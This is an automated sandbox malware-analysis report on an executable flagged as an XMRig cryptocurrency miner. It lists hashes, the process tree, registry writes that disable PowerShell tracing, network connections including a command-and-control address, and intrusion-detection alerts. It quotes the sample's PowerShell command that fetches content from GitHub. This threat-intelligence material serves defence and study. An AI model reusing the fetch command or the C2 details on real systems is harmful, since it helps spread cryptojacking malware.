analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

0082598df77e22bcffdcc6ab45e7be70N.exe

Full analysis: https://app.any.run/tasks/e29762dd-f565-47d2-b186-850fe051888e
Verdict: Malicious activity
Threats:

Crypto mining malware is a resource-intensive threat that infiltrates computers with the purpose of mining cryptocurrencies. This type of threat can be deployed either on an infected machine or a compromised website. In both cases the miner will utilize the computing power of the device and its network bandwidth.

Malware Trends Tracker     >>>
Analysis date: July 07, 2024, 10:50:36
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
miner
github
upx
xmrig
Indicators:
MIME: application/x-dosexec
File info: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
MD5:

0082598DF77E22BCFFDCC6AB45E7BE70

SHA1:

B6AD3994F4EAA831F2BFCBDD69BF37E97B144D90

SHA256:

5E581BEE8B66E447E6ECC1DD3E16EDD4BCDF874D2BC83F9A959D3142C1596EAA

SSDEEP:

49152:qHL+THhYqX8kEWkuNYyiSQbvk0jFEQ45rA2C9wvfMoeyNRQjm1gMkHC0IlnASExQ:qHCiU8uxWyiZbv1EQ4F7rNRQjmT

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Drops the executable file immediately after the start

      • 0082598df77e22bcffdcc6ab45e7be70N.exe (PID: 4424)

    • Connects to the CnC server

      • 0082598df77e22bcffdcc6ab45e7be70N.exe (PID: 4424)

    • Scans artifacts that could help determine the target

      • powershell.exe (PID: 1052)

    • XMRIG has been detected (YARA)

      • 0082598df77e22bcffdcc6ab45e7be70N.exe (PID: 4424)

  • SUSPICIOUS

    • Request a resource from the Internet using PowerShell's cmdlet

      • 0082598df77e22bcffdcc6ab45e7be70N.exe (PID: 4424)

    • Starts POWERSHELL.EXE for commands execution

      • 0082598df77e22bcffdcc6ab45e7be70N.exe (PID: 4424)

    • Potential Corporate Privacy Violation

      • 0082598df77e22bcffdcc6ab45e7be70N.exe (PID: 4424)

  • INFO

    • Checks supported languages

      • 0082598df77e22bcffdcc6ab45e7be70N.exe (PID: 4424)

    • Reads the computer name

      • 0082598df77e22bcffdcc6ab45e7be70N.exe (PID: 4424)

    • Disables trace logs

      • powershell.exe (PID: 1052)

    • Checks proxy server information

      • powershell.exe (PID: 1052)

    • Reads Internet Explorer settings

      • powershell.exe (PID: 1052)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 1052)

    • UPX packer has been detected

      • 0082598df77e22bcffdcc6ab45e7be70N.exe (PID: 4424)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | UPX compressed Win32 Executable (87.1)
.exe | Generic Win/DOS Executable (6.4)
.exe | DOS Executable Generic (6.4)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2019:09:04 19:31:32+00:00
ImageFileCharacteristics: Executable, Large address aware, No debug
PEType: PE32+
LinkerVersion: 14.22
CodeSize: 540672
InitializedDataSize: 4096
UninitializedDataSize: 3588096
EntryPoint: 0x8ca64
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows command line
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
117
Monitored processes
3
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start THREAT 0082598df77e22bcffdcc6ab45e7be70n.exe conhost.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
4424"C:\Users\admin\Desktop\0082598df77e22bcffdcc6ab45e7be70N.exe" C:\Users\admin\Desktop\0082598df77e22bcffdcc6ab45e7be70N.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Modules
Images
c:\users\admin\desktop\0082598df77e22bcffdcc6ab45e7be70n.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
3780\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exe0082598df77e22bcffdcc6ab45e7be70N.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1052powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
0082598df77e22bcffdcc6ab45e7be70N.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
Total events
7 274
Read events
7 249
Write events
25
Delete events
0

Modification events

(PID) Process:(1052) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(1052) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(1052) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(1052) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(1052) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(1052) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(1052) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(1052) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(1052) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(1052) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
Executable files
0
Suspicious files
8
Text files
103
Unknown types
0

Dropped files

PID
Process
Filename
Type
1052powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\E4DJRUXW\vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_smoothscroll-polyfill_di-75db2e-e091a6d939e9[1].jstext
MD5:2658FA77142D9A38479A85AC41A84CD9
SHA256:3F9C752182A74F07C7BB37F01119DB83F14577A530D19F3899BCB4A448D838A9
1052powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_bvexsg5g.eiv.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1052powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ypmtl2rg.3ad.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1052powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\AH8CR9J5\site-3ab44dbdb8a0[1].csstext
MD5:6898D881FB9B6758FB5A65B3B9FAC739
SHA256:2BB851AA74118BB53F44AE8BA20C228638AA5D08DFDE84581A3D67FCFEC05B7D
1052powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\AH8CR9J5\vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_details-d-ed9a97-dfdebffa4a55[1].jstext
MD5:7F7FCCA1FD0F56AB89999252B6CB18A0
SHA256:59BAACDB269857C460ED582447A4ED222C995A5908AF7C211C50B6373D9F9EDE
1052powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\E4DJRUXW\primer-61560ce103d3[1].csstext
MD5:B63465C413507E26CE54C310A3E81E03
SHA256:029C7BEF0B2978A1BE61D7D391A7E2AA5C9107F036DE4B119F5BB6A0065F2226
1052powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\E4DJRUXW\environment-a36e9a1c67ad[1].jstext
MD5:FE5E77781F5E74AC7EDFA1020DB49504
SHA256:B563AA76B8D16D0725359ED03A55D4EBF733FAB6A192456D1F1F56BAD6CDC2CE
1052powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\discussions-9d3cffcbc704[1].csstext
MD5:4459D0FDFC5ED2870B953934786D8E24
SHA256:23ED3D33C252B1B7E1498309F994EBC5448D5ED2D2BB48B580607517BE62B76C
1052powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\E4DJRUXW\dashboard-e264a87d442a[1].csstext
MD5:4928C91622B4AB71D3C741516CE3A27C
SHA256:595243D90FC171C6B9C6C1192A76057BA9066AB963AA6A77918070D2BC52CCCF
1052powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\KCV3KQBA\vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-03bcda509ec9[1].jstext
MD5:9C0205FABB4F94DCA52960B723FC5109
SHA256:D7C92CB4874D08BC420AB20D970C0EF1C5F26E42CEA345CFCCF4AB5653EC219E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
113
TCP/UDP connections
21
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
301
140.82.121.4:443
https://raw.githubusercontent.com/
unknown
GET
200
185.199.108.154:443
https://github.githubassets.com/assets/primer-primitives-8500c2c7ce5f.css
unknown
text
8.33 Kb
GET
200
185.199.109.154:443
https://github.githubassets.com/assets/light-efd2f2257c96.css
unknown
text
48.4 Kb
GET
200
185.199.109.154:443
https://github.githubassets.com/assets/dark-6b1e37da2254.css
unknown
text
48.3 Kb
GET
200
185.199.110.154:443
https://github.githubassets.com/assets/primer-61560ce103d3.css
unknown
text
333 Kb
GET
200
185.199.109.154:443
https://github.githubassets.com/assets/github-0c7b5281bcc9.css
unknown
text
124 Kb
GET
200
40.127.240.158:443
https://settings-win.data.microsoft.com/settings/v3.0/WSD/WaasMedic?os=Windows&osVer=10.0.19041.1.amd64fre.vb_release.191206-&appVer=10.0.19041.3758&ring=Retail&sku=48&deviceClass=Windows.Desktop&locale=en-US&deviceId=BAD99146-31D3-4EC6-A1A4-BE76F32BA5D4
unknown
binary
3.41 Kb
GET
200
185.199.108.154:443
https://github.githubassets.com/assets/dashboard-e264a87d442a.css
unknown
text
9.56 Kb
GET
200
185.199.109.154:443
https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-03bcda509ec9.js
unknown
binary
8.70 Kb
GET
200
185.199.109.154:443
https://github.githubassets.com/assets/home-f57bcc4383d0.css
unknown
text
9.76 Kb
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
4032
svchost.exe
239.255.255.250:1900
whitelisted
4424
0082598df77e22bcffdcc6ab45e7be70N.exe
3.120.98.217:8080
AMAZON-02
DE
unknown
1052
powershell.exe
185.199.110.133:443
raw.githubusercontent.com
FASTLY
US
unknown
6004
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2248
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1052
powershell.exe
140.82.121.3:443
github.com
GITHUB
US
unknown
1052
powershell.exe
185.199.109.154:443
github.githubassets.com
FASTLY
US
unknown
4
System
192.168.100.255:137
whitelisted
3040
OfficeClickToRun.exe
20.189.173.28:443
self.events.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
unknown

DNS requests

Domain
IP
Reputation
raw.githubusercontent.com
  • 185.199.110.133
  • 185.199.108.133
  • 185.199.111.133
  • 185.199.109.133
shared
settings-win.data.microsoft.com
  • 51.104.136.2
whitelisted
github.com
  • 140.82.121.3
shared
github.githubassets.com
  • 185.199.109.154
  • 185.199.108.154
  • 185.199.111.154
  • 185.199.110.154
whitelisted
self.events.data.microsoft.com
  • 20.189.173.28
whitelisted

Threats

PID
Process
Class
Message
Unknown Traffic
ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW)
4424
0082598df77e22bcffdcc6ab45e7be70N.exe
Potential Corporate Privacy Violation
ET POLICY Cryptocurrency Miner Checkin
Not Suspicious Traffic
INFO [ANY.RUN] Attempting to access raw user content on GitHub
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
4424
0082598df77e22bcffdcc6ab45e7be70N.exe
Potential Corporate Privacy Violation
ET POLICY Cryptocurrency Miner Checkin
4424
0082598df77e22bcffdcc6ab45e7be70N.exe
Potential Corporate Privacy Violation
ET POLICY Cryptocurrency Miner Checkin
4424
0082598df77e22bcffdcc6ab45e7be70N.exe
Potential Corporate Privacy Violation
ET POLICY Cryptocurrency Miner Checkin
4424
0082598df77e22bcffdcc6ab45e7be70N.exe
Potential Corporate Privacy Violation
ET POLICY Cryptocurrency Miner Checkin
4424
0082598df77e22bcffdcc6ab45e7be70N.exe
Potential Corporate Privacy Violation
ET POLICY Cryptocurrency Miner Checkin
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
0082598df77e22bcffdcc6ab45e7be70N.exe